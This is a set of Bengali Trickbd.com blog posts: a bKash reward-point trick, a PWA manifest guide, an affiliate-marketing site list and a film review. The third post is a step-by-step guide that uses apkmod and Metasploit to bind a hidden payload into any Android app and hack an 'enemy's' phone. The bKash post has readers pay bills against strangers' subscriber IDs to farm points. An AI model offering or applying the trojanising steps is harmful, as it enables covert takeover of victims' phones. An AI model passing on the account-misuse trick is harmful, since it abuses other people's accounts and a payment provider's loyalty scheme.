যে গ্রাহক যত বেশি লেনদেন করবে তার লেভেল তত বেশি অগ্রসর হবে এবং সেটা হবে পয়েন্ট অর্জনের মাধ্যমে। আর এই পয়েন্ট দিয়ে আপনি Cashback অফার নিতে পারবেন। এই Cashback এর পরিমাণ নির্ভর করবে আপনার লেভেল এর উপর। নিচে লেভেল এর উপর ভিত্তি করে কিছু Cashback অফার দেখানো হলো:

এখন প্রশ্ন হচ্ছে পয়েন্ট গুলো কিভাবে পাবো?

bKash এই পয়েন্ট গুলো অর্জনের কোনো নীতিমালা দেয়নি। অর্থাৎ কতটাকা লেনদেন করলে আপনি কত পয়েন্ট পাবেন তার কোনো ধরাবাঁধা নিয়ম নেই। তবে যারা এই পয়েন্ট নিয়ে খেলা করেছি, তারা একটা বিষয় লক্ষ্য করেছি যে, Send Money, Mobile Recharge, Cashout এগুলার চেয়ে Pay Bill এবং Payment এ সবসময় বেশি পয়েন্ট পাওয়া যায়।

তাই অনেকেই বেশি বেশি Pay Bill এবং Payment করতে চায়। কিন্তু পে বিল করতে গেলে বেশি করতে হয়। অর্থাৎ সর্বনিম্ন ১০ টাকা পে বিল করতে হয়। যার ফলে প্রতিদিন পে বিল করতে গেলে লাভের চেয়ে ক্ষতি বেশি। সেকারণে হয়তো অনেকে এখনো Pay Bill অপশন টা এখনো ব্যাবহার ই করতে পারেন নি। তাই আপনাদের দেখাবো কিভাবে শুধুমাত্র ১ টাকা পে বিল করেই অনেক বেশি পয়েন্ট অর্জন করতে পারবেন।

আপনারা অনেকেই হয়ত Akash DTH এর নাম শুনেছেন। এটা একটি TV Chanel কোম্পানি। যার পেমেন্ট গেটওয়ে তে পে বিল করা যায় সর্বনিম্ন ১ টাকা। কিন্তু এখানে পে বিল করতে গেলে Subscription করতে হয়। যেটা সবার করা নাই। তাই আমি আপনাদেরকে কিছু সাবসক্রাইব ID দেব। সেগুলোতে আপনারা ১ টাকা পে বিল করতে পারবেন। আগেই বলে রাখি, এখানে দেওয়া আইডিগুলো আমার না এবং আমার পরিচিত কারো না। তাই কেউ বাজে মন্তব্য করবেন না। আপনারা চাইলে এগুলার শেষ ডিজিট পরিবর্তন করেও পে বিল করতে পারবেন।আর Contact Number এর জায়গায় যেকোনো নাম্বার দিবেন।

তো চলুন দেখে নিই কিভাবে Akash DTH এ পে বিল করবো…

✓✓প্রথমে bKash এপসে ঢুকে Pay Bill অপশন এ যান।
✓✓তারপর নিচের মত “টিভি” তে ক্লিক করুন এবং এখান থেকে Akash DTH এ ক্লিক করুন।

✓✓এবার সাবসক্রাইব আইডি তে আমার দেওয়া যেকোনো একটি ID দেন।

✓✓Contact Number এর জায়গায় যেকোনো নাম্বার দিবেন। আপনার নিজেরটা চাইলে দিতে পারেন।

✓✓এমাউন্ট এর জায়গায় ১ টাকা দিন।

✓✓তারপর পরের ধাপে গিয়ে পিন দিলে পে বিল হয়ে যাবে।

Akash DTH Subscribe ID:
40413344, 40413356, 40413342, 40413345 ইত্যাদি।

ধন্যবাদ সবাইকে। না বুঝলে কমেন্ট এ জানাবেন।
Me in Facebook

The post bKash এপস ব্যবহারকারীরা এবার মাত্র ১ টাকা Pay Bill করুন। আর নিয়ে নিন বেশি বেশি Reward Point যা দিয়ে ১০-২৫০ টাকা পর্যন্ত ক্যাশব্যাক নিতে পারবেন। appeared first on Trickbd.com.

যেকোনো ওয়েবসাইটে pwa তৈরি করুন খুব সহজেই, ওয়েসাইটে pwa তৈরি করার নিয়ম

Posted:

আজকে আমি আবারো একটি পোস্ট নিয়ে এলাম কীভাবে আপনার ওয়েবসাইটে PWA বানাবেন।
ওয়েবসাইটে pwa বানানো খুবই সহজ আর এটি বানালে এটি একটি ক্রোমিয়াম অ্যাপে পরিনত হয়।
আজ আমি আপনাদেরকে একেবারে ফোলভাবে দেখাবো কীভাবে আপনি একটি পাওয়া pwa বানাবেন।
তো সবার আগে জেনে নিন pwa কী।

pwa কী

pwa হচ্ছে progressive web app যেটি তৈরি করলে ওয়েবসাইটটি অ্যাপের মতো হযে যাবে যখন আপনি এটিকে আপনার হোমস্ক্রিনে যুক্ত করবেন।
হোমস্ক্রিনে যুক্ত করার পর আপনি যখন হোমস্ক্রিনে এটিতে ক্লিক করবেন তখন এটি অ্যাপ হয়ে আউটপুট হবে মানে এটিকে আপনি অ্যাপের মতো করে ব্যবহার করতে পারবেন।
pwa শুধু ক্রোম ব্রাউজারে সাপোর্ট করবে এবং এপোল ফোনেও সাপোর্ট করবে।

কীভাবে তৈরি করবেনঃ

এটি তৈরি করা খুবই সহজ এবং আকর্ষনীয়।
আপনাকে বেশিকিছু করতে হবে না শুধু আপনার সাইটের জন্য একটি আইকন লাগবে পাওয়াতে উল্লেখযোগ্য সাইজের আর পাওয়া ফাইলটি আপনার ওয়েবসাইটে হোস্ট করতে হবে।
এটি যেকোনো ওয়েবসাইটে যোগ করতে পারবেন আপনি ইচ্ছে করলে ওয়াপকিজ,ব্লগার,ওয়ার্ডপ্রেস সহ অন্যান্য ওয়েবসাইটে খুব সহজেই বানাতে পারবেন।
আমি এটিকে ওয়াপকিজে তৈরি করে দেখাবো কারন আমার কাছে অন্য ওয়েবসাইট নেই বর্তমানে।
সমস্যা নাই এটি ওয়াপকিজে যেমন তৈরি করা সহজ তেমনি অন্য ওয়েবসাইটে তৈরি করাও সহজ।
প্রথমে pwa এর জন্য একটি .json ফাইল তৈরি করবেন।
json ফাইল তৈরি করতে নিচের কোডগুলো ব্যবহার করবেন নিচ থেকে কোডগুলো কপি করে নিনঃ

{ "name": "Your App name",
"short_name": "Your App name",
"start_url": "your website url",
"display": "standalone",
"background_color": "#ffffff",
"theme_color": "#1a73e8",
"description": "Your website description here ",
"icons": [{
"src": "https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgegkz0g7HiMFacHtw_y-oI29-QVD8Uf9IH8CZ5PIFailSkdHrpIxRJBnRtIM43FLnZMZTOub9u_u_sr4lA6tSUw3rgysVVdc4JMiF5_-hJDgQRzqwqLdW_Z3-YnppFtyJmGMwG3sPzCOv4/s400/iaos36.png' rel='apple-touch-icon",
"sizes": "36x36",
"type": "image/png",
"density": "0.75"
}, {
"src": "https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhg2_tLD3Jkvclsku_AiNW25syNLTNz3GN93hj3qMnDNMAM5LBmWzxCpE-M1ffF1ujMolsC9mnxRx9Tduk2qeJRX44IeiC3NpfWw6Z_ydat7a35tLA5ATbUvNtKgI9brn6MGeZG3N5ZGycT/s1600/iaos48.png' rel='apple-touch-icon' rel='apple-touch-icon",
"sizes": "48x48",
"type": "image/png",
"density": "1.0"
}, {
"src": "https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhdqHAP1X_2tIhn07juJys9yim9pZEq28_6Nu7kuWgXtZGM6LJxcSYc4PgHWjEjTcHClmiUUyUbNxhfE_2iUr6RJjauCMkYbx8stUNGRO-12K_4e90AqUwv9i_JqCKKN5JUcN0ToSJ5uksY/s400/iaos72.png' rel='apple-touch-icon",
"sizes": "72x72",
"type": "image/png",
"density": "1.5"
}, {
"src": "https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjYJqi4c6jwXZnD8OFsq2Etd_gaYOIE6NcwbHZERmNEsCCaa0ZQpbFFdSRuVdWgumb13a1t2UFvKdPqTsxXuW1zGymjmcOblqkOuWWFeF6jyAKuBSRkIyG3ZZPTgOMzON3wxNcc_kQImJud/s400/iaos96.png",
"sizes": "96x96",
"type": "image/png",
"density": "2.0"
}, {
"src": "https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiPvhX4YADK8xCWfOYZFjDqniL0oWnNEOkp4IcWWvSb8FZuU8eMG5b_I_mO0CxtsQnnWuVegjYGhhwhjJ7PMAZX8IciPH_VlwMbC5FLl8QO0V-5hEUk3Gv6RL9rfUaDC2vRB6mUEVPQRxNO/s1600/iaos144.png' rel='apple-touch-icon",
"sizes": "144x144",
"type": "image/png",
"density": "3.0"
}, {
"src": "https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg1IAnSQ5e4NsinLQZE0sYf4c1D0IeqIvAJGw20pW5q413zXsTQe6AYtze0vtsZSdEdSDp2qPhbtoqteYlXEgCODE3jrnnGyNzUj-f1BsJpUlIm6roo5t2lSQTMBIEZcZ_BUixJrVIywihP/s400/iaos192.png' rel='apple-touch-icon",
"sizes": "192x192",
"type": "image/png",
"density": "4.0"
}, {
"src": "https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhIdfmhncAxAYPAd5hSrwDrZ6d8eMtLvJ9v8fPDl-8g31qO277PWaXPfT92QSsTrCcPTLnzEZHbbVZ0ooeSWwN_e9BZtWAKuISnvBYguopdzPtAldu3vuE14Rpu5iaZdv4q_E9smxv1uVFE/s320/iaos512.png' rel='apple-touch-icon",
"sizes": "512x512",
"type": "image/png",
"density": "5.0"
}]
}

উল্লেখ্য এখানে app name এ আপনার অ্যাপের নাম দিবেন
icon এর সাইট অনুয়ায়ী আপনার আইকনের ইউআরএল দিন মনে রাখবেন icon এর সাইজ না মিললে pwa তৈরি হবে না।
তারপর এটি ফাইলম্যানেজারে সেইভ করবেনmanifest.json ফরম্যাটে।
এবার এই json ফাইলটি আপনার ওয়াপকিজ ফাইল ম্যানেজারে আপলোড করে ফাইলটির লিংক কপি করে নিন।

এবার নিচের meta কোডগুলোতে apple touch icon এ আপনার আইকনের url দিন।
আইকনের সাইজ হতে হবে 180*180 সাইজের।
<link href='https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhIdfmhncAxAYPAd5hSrwDrZ6d8eMtLvJ9v8fPDl-8g31qO277PWaXPfT92QSsTrCcPTLnzEZHbbVZ0ooeSWwN_e9BZtWAKuISnvBYguopdzPtAldu3vuE14Rpu5iaZdv4q_E9smxv1uVFE/s320/iaos512.png' rel='apple-touch-icon'/>
<!-- Rel Manifest Link -->
<link href='Your manifest.json file copied url here' rel='manifest'/>

এবার দেখুন এখানে আরো আছে manifest নামে একটি কোড এটির url বাদ দিয়ে আপনি যে json ফাইলটির লিংক কপি করেছিলেন সেটি পেষ্ট করুন এবং পুরো মেটা কোডগুলো কপি করে আপনার ওয়াপকিজ সাইটের meta header এ পেষ্ট করে দিন।
হোস্ক্রিন থেকে ব্রাউজারের থ্রি ডট থেকে Add home screen এ ক্লিক করে হোম স্ক্রিনে যোগ করে দিন।
ব্যাস এবার দেখুন pwa তৈরি হয়ে গেছে।

এভাবে আপনি ইচ্ছে করতে যেকোনো ওয়েবসাইটে বানাতে পারবেন।
তো আজকের বিষয়টি নিশ্চয়ই বোঝতে পেরেছেন যদি বোঝতে কোনো সমস্যা হয় তবে কমেন্ট করতে পারেন।

The post যেকোনো ওয়েবসাইটে pwa তৈরি করুন খুব সহজেই, ওয়েসাইটে pwa তৈরি করার নিয়ম appeared first on Trickbd.com.

কিভাবে android এর যেকোন apps এ virus or payload bind করবেন কেউ বুঝতেই পারবে না।হ্যাক করে ফেলুন আপনার শত্রুর ফোনটি।

Posted:

আসসালামু আলাইকুম । আশা করি সকলে ভালো আছেন । আমিও আলহামদুলিল্লাহ আপনাদের দোয়ায় অনেক ভালো আছি ।

গত পর্বে আমি virus or payload কিভাবে বানানো যায় কিভাবে সেটা port forwarding করতে হয় সেটা বলেছি । আজ আপনাদের সামনে নিয়ে আসলাম কিভাবে official app or যে কোন অ্যাপস ভিতর কিভাবে virus or payload bind করবেন।  কেউ বুঝতেই পারবে না যে এইটা অ্যাপসটার মধ্যে virus or payload bind করা আছে।  তো বেশি কথা না বলে কাজে চলে যাই।

অবশ্যই আপনার ফোনে metasploit ইনস্টল থাকতে হবে।

প্রথমে আমরা pkg update -y লিখে ইন্টার করবো।

এখন আমরা রান করবো pkg upgrade -y লিখে ইন্টার করবো।

এখন আমরা wget টা ইনস্টল করবো তার জন্য কমান্ড হচ্ছে pkg install wget লিখি ইন্টার করবো।

এখন আমরা মেইন টুলসটা ইনস্টল করবো।  তার জন্য আমাদের কমান্ড হচ্ছে।

wget https://raw.githubusercontent.com/Hax4us/Apkmod/master/setup.sh

লিখে ইন্টার করবো।

এখন আমরা ls দিবো।

আর হ্যাঁ setup.sh কে পারমিশন দিতে হবে।  আমি ও ss দিতে ভুলে গেছিলাম।  পারমিশন দেওয়ার জন্য কমান্ড হচ্ছে । chmod 777 setup.sh লিখে ইন্টার দিয়ে আবার ls করবেন।  যদি setup গ্রীন কালার হয় তাহলে বুঝবেন পারমিশন হয়েছে।

এখন আমরা setup.sh টুলস টা রান করবো। তার জন্য আপনার কিছু MB প্রয়োজন হবে ১৭০/২০০ মতো এবং কিছু সময় ও প্রয়োজন হবে ইনস্টল হতে।  আর হ্যাঁ ইনস্টল করার আগে অবশ্যই আপনার metasploit টা ইনস্টল থাকতে হবে।

ইনস্টল হওয়ার পর আমরা apkmod লিখে ইন্টার করবো।

যদি সঠিক ভাবে ইনস্টল হয় তাহলে এই রকম দেখতে পারবো।

এখন আমরা যেই অ্যাপস টির উপর virus or payload bind করবো সেই অ্যাপস টি ফোনের স্টো‌রেজ মেমোরিতে রেখে দিবো।এখন আমরা bind করার জন্য কমান্ড হচ্ছে।

apkmod -b -i /sdcard/s.apk -o /sdcard/ss.apk LHOST=127.0.0.1 LPORT=4444

এখানে -b মানে = binding payload

-i মানে =input file directory

S হচ্ছে আমার স্টোরেজে যেই অ্যাপসটি আছে তার নাম।

-o আউটপুট।

এখন আমরা ইন্টার দিবো।

সফল ভাবে bind হলে এই রকম দেখতে পারবো।  যদি bind এ কোন সমস্যা হয় তাহলে কমেন্ট এ বলবেন । যদি আপনি একসাথে অটো সব পারমিশন access করতে চান তাহলে নিচের কমান্ড টি রান করে দিবে তাহলে আবার নতুন করে apk তেরি হবে।

apkmod –enable-perm -i /sdcard/ss.apk -o /sdcard/sss.apk এখন আমরা আবার দেখতে পাবো

দেখতে পাচ্ছেন আমার ss.apk নামে app চলে আচ্ছে কেউ বুঝতেই পারবে না যে এই অ্যাপস টায় payload bind করা আছে।  তো আজ এই পর্যন্ত বুঝতে না পারলে comments করবেন। সামনে আরো special কিছু আচ্ছে ।

Facebook

YouTube

 

The post কিভাবে android এর যেকোন apps এ virus or payload bind করবেন কেউ বুঝতেই পারবে না।হ্যাক করে ফেলুন আপনার শত্রুর ফোনটি। appeared first on Trickbd.com.

Affiliate marketing বাংলাদেশী ওয়েবসাইটের পেমেন্ট বিকাশ নগদ

Posted:

আসসালামু আলাইকুম ওয়ারাহমাতুল্লাহি ওয়াবারাকাতুহ। আজকে আমরা এফিলিয়েট মার্কেটিং করে টাকা ইনকাম করার, বাংলাদেশী কয়েকটি ওয়েবসাইট নিয়ে আলোচনা করব। হ্যাঁ আপনারা ঠিকই শুনেছেন, এফিলিয়েট মার্কেটিং করার বাংলাদেশি কিসাইন আলোচনা করা হবে। আজকের এই আর্টিকেলে।

আপনারা হয়তো প্রায় সকলেই জানেন যে, এফিলিয়েট মার্কেটিং করে অনলাইনে কিছু পরিমাণ টাকা ইনকাম করা সম্ভব। তো এখন যদি আপনি অ্যাফিলিয়েট মার্কেটিং বাংলাদেস বসেই, বাংলাদেশি ওয়েবসাইটে করেন তাহলে সেটা কেমন হয়? নিশ্চয় অনেক ভালো হয় তাইনা! তো চলুন বন্ধুরে আর কথা না বাড়িয়ে বিস্তারিত এখনি জেনে নিই।

সত্যি কি বাংলাদেশের ওয়েবসাইট থেকে এফিলিয়েট মার্কেটিং করা সম্ভব?

যদিও কয়েক বছর আগে এফিলিয়েট মার্কেটিং করে টাকা ইনকাম করার সুযোগ ছিল না। অনলাইনে যারা আফিলিয়েট মার্কেটিং করতে চাই তো তাদেরকে, বিদেশী কোন প্লাটফর্মে যুক্ত হয়ে কাজ করতে হত। এমনকি এখনও বিদেশি ওয়েবসাইটে যুক্ত হয়, এফিলিয়েট মার্কেটিং করে টাকা ইনকাম করা যায়।

কিন্তু 2018 থেকে এখন পর্যন্ত আপনারা চাইলেই, বাংলাদেশি বিভিন্ন ধরনের ওয়েবসাইট পাবলিশ করা হয়েছে অনলাইনে, এফিলিয়েট মার্কেটিং এর জন্য। অনলাইনে বাংলাদেশি অনেক ওয়েবসাইট পাওয়া যায় অ্যাপলেট মার্কেটিং করার জন্য। তাই এটা সত্য যে, বাংলাদেশি ওয়েবসাইট থেকে অ্যাফিলিয়েট মার্কেটিং করা সম্ভব।

কিভাবে এফিলিয়েট মার্কেটিং করে টাকা ইনকাম করতে হয়?

এফিলিয়েট মার্কেটিংঃ আপনি যদি অনলাইনে অ্যাফিলিয়েট মার্কেটিং করে টাকা ইনকাম করতে চান তাহলে, আপনাকে প্রথমে জানতে হবে কিভাবে এফিলিয়েট মার্কেটিং করতে হয়? বাফেট মার্কেটিং করে কিভাবে টাকা ইনকাম হয়? তো আপনার ভিতরে যদি এই প্রশ্নগুলো থেকে থাকে তাহলে,

চিন্তার কিছু নেই আমরা আস্তে আস্তে এগুলো নিয়ে আলোচনা করব। এফিলিয়েট মার্কেটিং সাধারণত, কোন কোম্পানির প্রোডাক্ট বা সার্ভিস প্রচার করা। ব্যস আর কিছু না! শুধু আপনি কোন একটি কোম্পানির সাথে যুক্ত হয়, সেই কোম্পানির প্রডাক্ট পণ্য সার্ভিস ইত্যাদি’ প্রচার করে বেড়াবেন।

আপনার প্রচার করার জন্য, ওই কোম্পানি আপনাকে অ্যাফিলিয়েট মার্কেটার করে দিবে। এই অ্যাফিলিয়েট মার্কেটার হয়েই আপনাকে তাদের কোম্পানির প্রোডাক্ট গুলো নির্দিষ্ট গ্রাহকের কাছে পৌঁছে দিতে হবে। আপনার প্রচার করা কোন পণ্য যদি গ্রাহকেরা ক্রয় করে তাহলে, হই কোম্পানি থেকে আপনার তার বিনিময় কিছু কমিশন যোগ করা হবে।

ঠিক এভাবে করে অনলাইনে অ্যাফিলিয়েট মার্কেটিং করে টাকা ইনকাম করতে হয়। যদি আফিলিয়েট মারকেটিং ততটা কঠিন কাজ নয়। আবার একেবারে যে সহজ নয় সেটাও কিন্তু নয়। তবে ধৈর্য এবং পরিশ্রম এই কাছে অবশ্যই প্রয়োজন হবে। আশা করি আপনারা বুঝতে পেরেছেন কিভাবে এফিলিয়েট মার্কেটিং করে টাকা ইনকাম হয় সেটা!

অনলাইনে এফিলিয়েট মার্কেটিং করে টাকা ইনকাম করার বাংলাদেশী সেরা কয়েকটি ওয়েবসাইট?

1. BD Shop

2. JAAKKASH

3. Sohoj Affiliates

উপরের যে 3 টি ওয়েবসাইট বা প্ল্যাটফর্ম আপনারা দেখতে পাচ্ছেন। এই তিনটি প্লাটফর্ম থেকে, এফিলিয়েট মার্কেটিং করা যায়। আর এই তিনটি প্লাটফর্মই বাংলাদেশি প্ল্যাটফর্ম। যে কেউ চাইলে এই প্ল্যাটফর্মগুলোতে যুক্ত হয়ে, এফিলিয়েট মার্কেটিং করে সহজে ইনকাম করতে পারবেন।

BD Shop

বিডি শপ ভালো বাংলাদেশি সেরা একটি প্ল্যাটফর্ম। যেখানে তারা 24 ঘন্টায় প্রায় একটিভ থাকে। আর আপনারা চাইলে এই এই বিডি শপে এফিলিয়েট মার্কেটিং করে টাকা ইনকাম করতে পারবেন। এটি সম্পূর্ণ বাংলাদেশের একটি প্ল্যাটফর্ম। আর এই প্লাটফর্মে তারা অ্যাপলেট মার্কেটিং চালু করে রেখেছে।

আপনারা চাইলে, যে কেউ এই প্ল্যাটফর্মের যুক্ত হয়ে, এফিলিয়েট মার্কেটিং করতে পারবেন ঘরে বসেই। মূলত এই ওয়েবসাইটে আপনারা সহজে খুঁজে পাবেন বিভিন্ন ধরনের প্রোডাক্ট। এই প্রোডাক্ট গুলো নির্দিষ্ট গ্রাহকের কাছে পৌঁছে দিয়ে, অর্থাৎ এফিলিয়েট মার্কেটিং করে ইনকাম করার সুযোগ পাবেন। আর মাত্র 500 টাকা হলে এর ওয়েবসাইট থেকে টাকা উত্তোলন করা যায়।

এই ওয়েবসাইটে আপনার একাউন্টে 500 টাকা জমা হলেই, বিকাশ রকেট ব্যাংক ইত্যাদি একাউন্টের মাধ্যমে, এই ওয়েবসাইট থেকে আপনারা টাকা উত্তোলন করে নিতে পারবেন। তবে তার জন্য আপনাকে কে এই ওয়েবসাইটের নিয়ম-নীতি মেনে কাজ করতে হবে। কারণ নিয়মিত অমান্য করে কাজ করলে আপনার অ্যাকাউন্ট ব্লক হতে পারে।

JHAKKASH

এই ওয়েবসাইটটি বাংলাদেশি একটি ওয়েবসাইট। ওয়েবসাইট থেকেও এফিলিয়েট মার্কেটিং করে টাকা ইনকাম করা সম্ভব। কেননা তাদের প্ল্যাটফর্ম তারা অ্যাফিলিয়েট প্রোগ্রাম চালু করে রেখেছে। তাদের অ্যাফিলিয়েট প্রোগ্রাম এ যুক্ত হলে আপনারা সহজেই,

এই ওয়েবসাইটে এফিলিয়েট মার্কেটিং করে টাকা ইনকাম করতে পারবেন। মূলত এই ওয়েবসাইট এ কাজ করার জন্য আপনাকে এখানে প্রথমে রেজিস্ট্রেশন করতে হবে। আপনাদের পার্সনাল কিছু তথ্য দিয়ে। এই ওয়েবসাইটে রেজিস্ট্রেশন করেই, এফিলিয়েট মার্কেটিং করে টাকা ইনকাম করতে পারবেন।

এই ওয়েবসাইটে আপনারা অ্যাফিলিয়েট মার্কেটিং করে বেশ ভালো পরিমাণে টাকা ইনকাম করার সুযোগ পাবেন। এই ওয়েবসাইটে নির্দিষ্ট পরিমাণে এমাউন্ট আপনার একাউন্টে জমা হলেই, বিকাশ অথবা ব্যাংক ইত্যাদি একাউন্টের মাধ্যমে টাকা উত্তোলন করতে পারবেন। আমি কখনো এই ওয়েবসাইটে প্রবেশ করি নাই তবে, আপনার একাউন্টে নির্দিষ্ট পরিমাণ টাকা আসলেই উত্তোলন করে নিতে পারবেন।

Sohoj Affiliates

এই ওয়েবসাইটে এফিলিয়েট মার্কেটিং করে টাকা ইনকাম করার সবচেয়ে জনপ্রিয় ওয়েবসাইট। আমি নিজেও এই ওয়েবসাইটে কাজ করেছি, তাই আপনারা চাইলে এই সাইটে কাজ করতে পারেন। এই ওয়েবসাইটের রেজিস্ট্রেশন করার সাথে সাথে আপনার একাউন্টে 100 টাকা বোনাস দেওয়া হবে।

আর তাদের কোম্পানির প্রোডাক্ট পণ্যগুলো আপনি যদি, ক্রয়-বিক্রয় অর্থাৎ বিক্রি করতে পারেন, তার জন্য ওই কোম্পানি আপনাকে কিছু পারসেন্ট কমিশন দিব। তাছাড়া এই ওয়েবসাইট আপনারা সরাসরি, বিকাশ নগদ রকেট ইত্যাদি একাউন্টে টাকা উত্তোলন করতে পারবেন। এমনকি মাত্র 500 টাকা হলে টাকা উত্তোলন করার সুযোগ রয়েছে এই ওয়েবসাইটে।

এই ওয়েবসাইটে আপনারা তাদের কোম্পানির পণ্য প্রোডাক্ট ইত্যাদি’ প্রচার করে, যদি কোনো গ্রাহক তাদের কোম্পানির প্রোডাক্ট গুলো ক্রয় করে, ঠিক তার বিনিময় ওই কোম্পানির আপনার কমিশন একাউন্টে যোগ করবে। ঠিক এভাবে করে আপনারা চাইলেই এই ওয়েবসাইটে কাজ করে, অ্যাফিলিয়েট মার্কেটিং করতে পারেন। আর তাদের কোম্পানির প্রোডাক্ট বিক্রি করতে পারবেন আপনার ইনকাম তত বেশি হবে।

আর্টিকেল সম্পর্কিত গুরুত্বপূর্ণ কিছু কথাঃ

আজকে আমরা বাংলাদেশী কয়েকটি ওয়েবসাইট নিয়ে আলোচনা করেছি! আপনি চাইলেই এই প্ল্যাটফর্মে যুক্ত হয়ে, বাংলাদেশে বসেই এফিলিয়েট মার্কেটিং করে ইনকাম করতে পারেন। তবে প্রত্যেকটি ওয়েবসাইটের জন্য নির্দিষ্ট কিছু নিয়ম-নীতি রয়েছে। কাজকর্মের জন্য আপনাদের অবশ্যই তাদের ওয়েবসাইটটের,নিয়ম-নীতি মেনে কাজ করতে হবে।

তাদের ওয়েবসাইটে নিয়মনীতি না মেনে কখনোই কাজ করবেন না। কেননা তাদের নিয়ম নীতি না মেনে কাজ করলে আপনার অ্যাকাউন্ট ব্লক হতে পারে। তাই অধিক সতর্কতার সাথে আপনাদেরকে এই প্ল্যাটফর্মগুলোতে কাজ করতে হবে। আশা করি তাহলে আপনারা এই ওয়েবসাইট গুলোতে এফিলিয়েট মার্কেটিং করে টাকা ইনকাম করতে পারবেন।

আজকে আপনাদের অ্যাফিলিয়েট মার্কেটিং করে টাকা ইনকাম করার, বেসিক অনেক ধারণা দিলাম, যাতে করে আপনারা সহজেই অ্যাফিলিয়েট সম্পর্কে ধারণা পেতে পারেন। আর যে কয়েকটি ওয়েবসাইট শেয়ার করেছি, এই ওয়েবসাইটগুলো সম্পূর্ণ বাংলাদেশী ওয়েবসাইট। যেখানে আপনারা চাইলে আপনিও মার্কেটিং করে টাকা ইনকাম করতে পারেন।

পরিশেষে,


প্রিয় বন্ধুরা খুবই জনপ্রিয় বাংলাদেশী কয়েকটি ওয়েবসাইট নিয়ে আলোচনা করেছি। যেখানে আপনারা চাইলে আফিলিয়েট মার্কেটিং করে টাকা ইনকাম করতে পারবেন। ওয়েবসাইটগুলো সম্পর্কে সংক্ষিপ্ত আকারে হলেও আপনাদের ধারণা দিয়েছি। যদি কোন প্রশ্ন থেকে থাকে তাহলে কমেন্ট সেকশনে ও জানাতে ভুলবেন না।

আপনাদের কমেন্টের অর্থাৎ মন্তব্য দেয়ার চেষ্টা করব আমরা খুব শীঘ্রই। বরাবরের মত আমাদের আজকের আর্টিকেলটি পড়ার জন্য সবাইকে অসংখ্য ধন্যবাদ। আজকের আর্টিকেলটি এপর্যন্তই, দেখা হবে আবার অন্য কোন আর্টিকেলে। সবাই ভাল থাকুন সুস্থ থাকুন এবং নিরাপদে থাকুন। দেখা হবে আবার অন্য কোন আর্টিকেলে। আসসালামু আলাইকুম রাহমাতুল্লাহি ওয়াবারকাতুহু।

The post Affiliate marketing বাংলাদেশী ওয়েবসাইটের পেমেন্ট বিকাশ নগদ appeared first on Trickbd.com.

Bob Biswas: “কাহিনী” মুভিতে সিরিয়াল কিলার হিসেবে অভিনয় করা শাশ্বত চট্টোপাধ্যায়ের বায়োপিক নিয়ে নির্মিত অসাধারণ মুভি।

Posted:

▪Bob Biswas (2021)

▪Genre : Crime /Thriller

▪IMDb : 7.3

▪Personal Rating : 8/10

▪Run Time : 2 hours 11 Minutes

 

আমার মনে হয় এ বছর বলিউড এ যে কয়টা সেরা মুভি দেখেছি Bob Biswas তাদের মাঝে একটা।

বলতে গেলে সেরা পাচঁ টা মুভির একটা। প্রশংসার জোয়ারে ভাসছে মুভিটি।

আর আমি যদি এত সুন্দর মুভিটা নিয়ে কিচ্ছু না লিখি তাহলে তো আমার একদম ভালো লাগবে না।

অসাধারণ একটা মুভি দেখে শেষ করলাম। আচ্ছা আমরা সবাই “Kahaani”মুভিটা দেখেছিলাম নিশ্চই!

মুভিতে খুব অল্প সময়ের জন্য একজন পার্ট টাইম কন্ট্রাক্ট কিলার কে দেখেছিলাম।মনে আছে! অল্প একটু সময়ের জন্য এসেছিলেন তিনি।

অথচ পুরো টা সময় আতংকে ভরিয়ে রেখেছিলেন।জি ঠিক ধরেছেন। আমি শাশ্বত চ্যাটার্জী এর কথা বলছি।

এবার রিভিউয়ের শুরুতে আমি উনার কথা কেনো বলছি সে প্রশ্নের উত্তর মুভিতেই পাবেন। মুভিতে অভিষেক বচ্চন দুর্দান্ত অভিনয় করেছেন।

এর আগে তিনি কোন মুভিতে এত ভালো পারফর্ম করেছেন কিনা আমার মনে পরছে না।

তবে LUDO মুভিতে তার অভিনয় ছিলো দেখার মত। যাই হোক, মুভিটা এত ভালো লাগার পেছনে আরো একটা বড় কারন হচ্ছে এই মুভিতে বেশ কিছু নাম করা বাঙালী অভিনেতা অভিনেত্রী রয়েছেন।

যেমন কাঞ্চন মল্লিক, পরান বন্দোপাধ্যায়, রজতাভ দত্ত সহ আরো অনেকেই।সবার অভিনয়ই আমার কাছে খুব ভালো লেগেছে।

মুভির কালার গ্রেডিং, সিনেমাটোগ্রাফি এবং ব্যাকগ্রাউন্ড মিউজিক ছিলো যথেষ্ট প্রশংসনীয়। মুভিটির ডিরেক্টর ছিলেন অন্নপূর্ণা ঘোষ।

এবার Bob চরিত্রে অভিষেক কে নিয়ে কিছু লিখি। উনার কথা বলার ধরন,হেয়ার স্টাইল, বডি মুভমেন্ট এক কথায় অসাধারণ।

আর আমার তো মুভটা দেখার পর মনে হচ্ছে অভিষেক ছাড়া আর কেউ এত সুন্দর করে Bob চরিত্র টি হয়তো ফুটিয়ে তুলতে পারতেন না। এবার আমি অল্প করে মুভির প্লট নিয়ে লিখছি।

বাকি সব কাস্ট যার যার অবস্থান থেকে খুব ভালো অভিনয়ই করেছেন।

সিনেমাটোগ্রাফি, লোকেশন,ব্যাকগ্ৰাউন্ড মিউজিক সবকিছুই ছিল ঠিকঠাক।

এখন এগিয়ে যাব কাহিনীর দিকে : বব বিশ্বাস এক্সিডেন্ট তার অতীত সম্পর্কে সব ভুলে যায় ।

মাঝখানে প্রায় আট বছর ছিল কোমায় । বব তার অতীত ভুলে গেলেও কি অতীত তাকে ভুলতে পারবে? মোটেও না!!!!

কিন্তু অন্য দিকে সবকিছু ছেড়ে পরিবারের সাথে নতুন জীবন শুরু করতে চাওয়া বব বিশ্বাস। এই সবকিছুরই প্রতিচ্ছবি ফুটিয়ে তোলা হয়েছে পুরো মুভি জুড়ে।

বলিউডে স্পিন-অফ মুভি খুব একটা হয়না।

সে হিসেবে ভালো এক চেষ্টা ছিল। এবং সফল ও বলা যায়।

সবমিলিয়ে, ইঞ্জয়েবল একটা মুভি।

Link: Bob Biswas Movie

